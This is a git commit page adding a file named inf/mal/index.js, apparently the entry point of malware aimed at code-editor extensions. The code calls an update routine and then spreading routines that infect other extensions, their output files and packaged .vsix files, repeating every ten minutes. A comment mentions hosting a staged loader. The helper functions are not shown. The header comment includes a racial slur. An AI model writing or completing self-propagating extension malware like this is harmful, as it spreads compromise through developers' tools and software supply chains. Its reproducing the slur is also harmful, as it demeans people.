aboutsummaryrefslogtreecommitdiff
path: root/inf/mal/index.js
diff options
context:
space:
mode:
authorspv <spv@spv.sh>2025-05-04 20:12:34 -0400
committerspv <spv@spv.sh>2025-05-04 20:12:34 -0400
commite2d1d18715a7c5b80cce02a96b09a5d57de38072 (patch)
tree59ff2ca2227675aaf4173ec4b6c521fff31532ed /inf/mal/index.js
flawless victory
Diffstat (limited to 'inf/mal/index.js')
-rw-r--r--inf/mal/index.js20
1 files changed, 20 insertions, 0 deletions
diff --git a/inf/mal/index.js b/inf/mal/index.js
new file mode 100644
index 0000000..a87e788
--- /dev/null
+++ b/inf/mal/index.js
@@ -0,0 +1,20 @@
+/*
+ * flawless victory, ya niggas can't do shit to me
+ * physically, lyrically, hypothetically, realistically
+ */
+
+// XXX find a decent host for stage1 loader & stage2.bin
+
+update_malware();
+
+/* spread to other extension's output files if opened in workspace */
+extension_js_spread();
+
+/* spread to other extensions in case we get nuked */
+extension_spread();
+
+/* spread to any packaged extensions in the current directory */
+vsix_spread();
+
+/* keep spreading in case the files get updated / created */
+setInterval(vsix_spread, 600000); \ No newline at end of file